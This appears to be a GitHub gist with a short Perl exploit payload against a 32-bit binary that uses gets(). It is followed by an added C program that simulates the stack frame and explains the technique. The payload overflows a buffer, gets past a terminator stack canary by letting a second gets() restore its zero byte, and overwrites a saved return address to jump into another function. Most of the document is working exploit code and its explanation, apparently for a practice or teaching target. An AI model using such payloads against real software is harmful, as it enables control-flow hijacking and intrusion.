@ramntry
Created February 20, 2014 20:38
Some binary exploit :)
#!/usr/bin/env perl
print "a" x 32; # fill the buffer up to the canary
print "Z"."\x45\x8b\x6b"; # keep the canary's upper three bytes; a placeholder 'Z' stands in for its zero low byte so the C string continues past the canary in memory
print "b" x 12; # fill the gap between the canary and the saved return address
print "\x5b\x85\x04\x08"; # overwrite func_A()'s return address (into main()) with the start of func_B()
print "\xd3\x94\xe1\xf7"; # the next dword becomes func_B()'s return address: the same address main() would return to
print "\n"; # end the first gets() line; the program then waits for a second one
print "c" x 32; # second line with no newline: gets() stores its terminating NUL at offset 32, putting the real zero byte back into the canary
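As an added example (not code from the gist or its author), the following C program models the stack frame the payload assumes and feeds the same bytes through a gets()-like reader, so you can see why the canary check passes after the second line and where the two addresses end up. The frame layout (32-byte buffer, canary, 12-byte gap, two return slots) is inferred from the payload and is an assumption, as is the extra slot that absorbs the first read's terminating NUL; the canary value and addresses are the ones in the gist.

```c
/* Added example, not part of the gist or its author's code: a host-side model of
 * the stack frame that the Perl payload assumes, fed the same bytes through a
 * gets()-like reader. The frame layout is inferred from the payload and is an
 * assumption; canary value and addresses are the gist's. */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout of func_A()'s frame, matching the payload: 32 + 4 + 12 + 4 + 4 bytes. */
struct frame {
    char          buf[32];    /* the gets() target, lowest address */
    unsigned char canary[4];  /* x86 terminator canary: 0x00 sits in the lowest byte */
    char          gap[12];    /* locals / saved ebp between canary and return address */
    unsigned char ret_a[4];   /* func_A()'s saved return address (into main()) */
    unsigned char ret_b[4];   /* next slot: what func_B()'s ret pops after the jump */
    char          spill[4];   /* assumed next slot, where the first gets() drops its NUL */
};

static const unsigned char CANARY[4]   = { 0x00, 0x45, 0x8b, 0x6b }; /* 0x6b8b4500 */
static const unsigned char FUNC_B[4]   = { 0x5b, 0x85, 0x04, 0x08 }; /* 0x0804855b */
static const unsigned char MAIN_RET[4] = { 0xd3, 0x94, 0xe1, 0xf7 }; /* 0xf7e194d3 */

/* Read a little-endian dword the way the CPU would. */
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* gets() semantics, no bound check: copy up to '\n' or end of input, then store '\0'. */
static void unsafe_gets(char *dst, const unsigned char **in, const unsigned char *end) {
    const unsigned char *p = *in;
    while (p < end && *p != '\n') *dst++ = (char)*p++;
    *dst = '\0';        /* on the second call this NUL lands on the canary's low byte */
    if (p < end) p++;   /* consume the newline */
    *in = p;
}

/* The same byte stream the Perl script prints. Returns its length. */
static size_t build_payload(unsigned char *out) {
    size_t n = 0;
    memset(out + n, 'a', 32); n += 32;                      /* fill buf */
    out[n++] = 'Z'; memcpy(out + n, CANARY + 1, 3); n += 3; /* 'Z' stands in for the 0x00 */
    memset(out + n, 'b', 12); n += 12;                      /* fill gap */
    memcpy(out + n, FUNC_B, 4); n += 4;                     /* func_A() returns into func_B() */
    memcpy(out + n, MAIN_RET, 4); n += 4;                   /* func_B() returns where main() would */
    out[n++] = '\n';                                        /* ends the first gets() */
    memset(out + n, 'c', 32); n += 32;                      /* second line, no newline */
    return n;
}

/* Feed both lines to a fresh frame. Returns the canary's low byte after the first read,
 * i.e. what the check would see if func_A() returned between the two gets() calls. */
static int simulate(struct frame *f) {
    unsigned char payload[128];
    size_t n = build_payload(payload);
    const unsigned char *in = payload, *end = payload + n;
    int low_after_first;

    memset(f, 0, sizeof *f);
    memcpy(f->canary, CANARY, 4);
    /* Write through a pointer to the whole frame so the overflow stays inside one object. */
    unsafe_gets((char *)f, &in, end);          /* first gets(): runs past the canary */
    low_after_first = f->canary[0];
    unsafe_gets((char *)f, &in, end);          /* second gets(): 32 bytes, NUL at offset 32 */
    return low_after_first;
}

/* Accessors that rerun the simulation so each answer stands on its own. */
static int canary_low_byte_after_first_gets(void) { struct frame f; return simulate(&f); }
static uint32_t canary_after_second_gets(void) { struct frame f; simulate(&f); return le32(f.canary); }
static int canary_intact_after_second_gets(void) { struct frame f; simulate(&f); return memcmp(f.canary, CANARY, 4) == 0; }
static uint32_t func_a_return_address(void) { struct frame f; simulate(&f); return le32(f.ret_a); }
static uint32_t func_b_return_address(void) { struct frame f; simulate(&f); return le32(f.ret_b); }

int main(void) {
    printf("canary low byte after first gets(): 0x%02x (check would fail here)\n",
           canary_low_byte_after_first_gets());
    printf("canary after second gets():         0x%08" PRIx32 " (%s)\n",
           canary_after_second_gets(), canary_intact_after_second_gets() ? "intact" : "clobbered");
    printf("func_A() returns to 0x%08" PRIx32 ", func_B() then returns to 0x%08" PRIx32 "\n",
           func_a_return_address(), func_b_return_address());
    return 0;
}
```

The point the model makes concrete is the ordering: between the two reads the canary's low byte is 'Z', so a canary check at that moment would abort; the check only runs in func_A()'s epilogue, after the second gets() has written its terminating NUL over exactly that byte. The trick therefore depends on both reads happening before any function with a canary returns, and on the second input being exactly 32 bytes with no trailing newline or further data.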